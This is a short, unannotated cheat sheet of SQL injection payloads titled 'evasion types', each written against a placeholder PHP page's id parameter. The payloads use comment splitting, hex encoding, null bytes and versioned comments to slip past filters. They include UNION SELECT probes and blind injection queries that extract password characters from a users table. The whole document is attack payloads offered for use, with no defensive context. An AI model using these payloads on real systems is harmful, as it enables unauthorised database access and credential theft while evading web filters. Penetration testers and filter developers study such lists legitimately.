# evasion types 

www.site.com/home.php?id=-2 /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3—
www.site.com/home.php?id=-2%20Union%20Select%201,2,3--
www.site.com/home.php?id=-2 0x756e696f6e2073656c65637420312c322c332d2d 
www.site.com/home.php?id=-2%20Union%20Select%201,2,3--
www.site.com/home.php?id=-2‘ and (select substr(group_concat(pass),1,1) from users)=’a
www.site.com/home.php?id=-2‘ and substr((select max(pass) from users),1,1)=’a
www.site.com/home.php?id=-2‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a
www.site.com/home.php?id=-2 0/**/union/*!50000select*/
www.site.com/home.php?id=-2‘||1=’1
www.site.com/home.php?id=-2‘&&1=’1
www.site.com/home.php?id=-2 or 1=convert(int,(USER))--
www.site.com/home.php?id=-2 %00%20union select 1,2,3--
www.site.com/home.php?id=-2 and 8<>200--
www.site.com/home.php?id=-2' like 90=90'--+-
www.site.com/home.php?id=-2 \0%20union select 1,2,3--
